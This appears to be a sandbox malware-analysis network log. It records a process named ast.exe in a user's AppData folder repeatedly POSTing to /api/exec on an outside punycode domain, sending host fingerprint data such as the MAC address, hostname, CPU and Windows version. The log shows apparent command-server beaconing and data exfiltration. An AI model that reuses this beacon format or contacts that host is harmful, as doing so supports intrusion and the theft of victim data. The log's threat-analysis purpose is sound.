                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.550001212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:16 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:16 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.550004212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:17 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:17 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.550007212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:18 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:18 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          8192.168.2.550010212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:19 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:19 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          9192.168.2.550013212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:19 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:19 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          10192.168.2.550016212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:20 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:20 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          11192.168.2.550019212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:21 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:21 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          12192.168.2.550022212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:22 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:22 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          13192.168.2.550025212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:23 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:23 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          14192.168.2.550028212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:24 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:24 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          15192.168.2.550031212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:25 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:25 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          16192.168.2.550040212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:28 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:28 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.
                                                                                                                                          2024-11-19 17:57:28 UTC403OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.19045) x64


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          17192.168.2.550043212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:29 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:29 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          18192.168.2.550046212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:30 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:30 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          19192.168.2.550049212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:31 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
